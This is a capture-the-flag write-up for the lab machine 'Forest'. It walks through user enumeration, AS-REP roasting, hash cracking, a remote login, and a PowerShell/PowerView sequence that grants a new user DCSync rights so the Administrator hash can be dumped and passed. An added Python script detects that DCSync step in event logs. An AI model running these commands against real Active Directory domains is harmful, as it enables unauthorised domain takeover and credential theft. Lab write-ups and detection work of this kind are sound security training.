# Forest

## Gaining Access

Nmap scan:

Lots of ports are open, as is normal when scanning a domain controller.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-de273dfdb789fc48e64f61fd31edceff1f648de6%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

### SMB Null Session

Using `enum4linux` with no credentials, we find that the host accepts null sessions, and we can enumerate some users.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-35068d23f208a34eaf6750e86931262a7e0b70fd%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

With a user list, we can attempt AS-REP Roasting before moving on, and we find a hash for the `svc-alfresco` user.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-9878c140814139651b7c4cadc25ca51f914138c0%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Then, we can use `john` to crack the hash easily.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-426b2fd285f9cdf3c10a90225726d67e813a35f9%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Afterwards, we can `evil-winrm` in as this user.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-996b44760b9ae0e34980a1b83fad704aa9c69f16%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Bloodhound Enum

I ran SharpHound on the machine to collect and enumerate the domain for me. After loading up Bloodhound and uploading the data, this is what we find:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-e01c3f648d8c96dc7dbe49ea06881f80f3b222bc%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

The user we have control over seems to have GenericAll permissions over the Exchange Windows Permissions group, which has WriteDacl permissions over the DC.

The attack is as follows:

* Add a user to the domain and into the Exchange Windows Permissions user group
* Add DCSync permissions for that user

This can be achieved using some Windows commands and PowerView:

```powershell
# Create a new domain user and add it to the group that holds WriteDacl on the domain
net user hello hello@123 /add /domain
net group "Exchange Windows Permissions" /add hello
# Build a credential object for the new user so PowerView acts with its token
$pass = ConvertTo-SecureString 'hello@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\hello', $pass)
# PowerView must be loaded first (e.g. . .\PowerView.ps1); this grants the replication rights that DCSync uses
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hello -Rights DCSync
```

Afterwards, we have a new user with DCSync permissions, which lets us dump the Administrator hash using `secretsdump.py`.
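From the defender's side, the DCSync step above is visible in the Security log: a replication request by an account that is not a domain controller shows up as event 4662 with the Control Access bit set and the replication extended-right GUIDs in its Properties field. The following detection script is an added example, not part of this writeup; the flattened event lines, the `FOREST$` DC account allow-list, and the `key=value` layout are constructed for the demonstration, while the rights GUIDs are the well-known Active Directory values.

```python
import re

# Extended-rights GUIDs a replication (DCSync) request needs. These are the
# well-known AD control-access right identifiers, not values from this writeup.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" (extended right)

# Constructed allow-list: domain controller computer accounts replicate legitimately.
DC_ACCOUNTS = {"FOREST$"}

# Constructed sample of Security log events, flattened to one key=value line each.
SAMPLE_EVENTS = """\
EventID=4662 SubjectUserName=FOREST$ AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=svc-alfresco AccessMask=0x10 Properties={bf967a86-0de6-11d0-a285-00aa003049e2}
EventID=4662 SubjectUserName=hello AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2};{89e95b76-444d-4c62-991a-0facbeda640c}
EventID=4624 SubjectUserName=hello AccessMask=0x0 Properties=
"""

FIELD_RE = re.compile(r"(\w+)=(\S*)")

def parse_event(line):
    """Turn one flattened event line into a dict of its key=value fields."""
    return dict(FIELD_RE.findall(line))

def detect_dcsync(log_text):
    """Return (account, [right names]) for every 4662 event in which an
    account outside the DC allow-list exercised a replication extended right."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        if not int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
            continue
        guids = re.findall(r"[0-9a-f-]{36}", ev.get("Properties", "").lower())
        rights = [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]
        if rights and ev["SubjectUserName"].upper() not in DC_ACCOUNTS:
            hits.append((ev["SubjectUserName"], rights))
    return hits

if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Only the `hello` account is flagged: the DC's own replication is allow-listed, and the `svc-alfresco` event touches an unrelated property without the Control Access bit.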

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-29f11acd4a3bd5b1008b38e3ca382fd3f6a903f7%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Then, we can pass the hash easily to gain access as the Administrator.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-828c30a7cec4897b008b129076a6a9d24480931a%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>
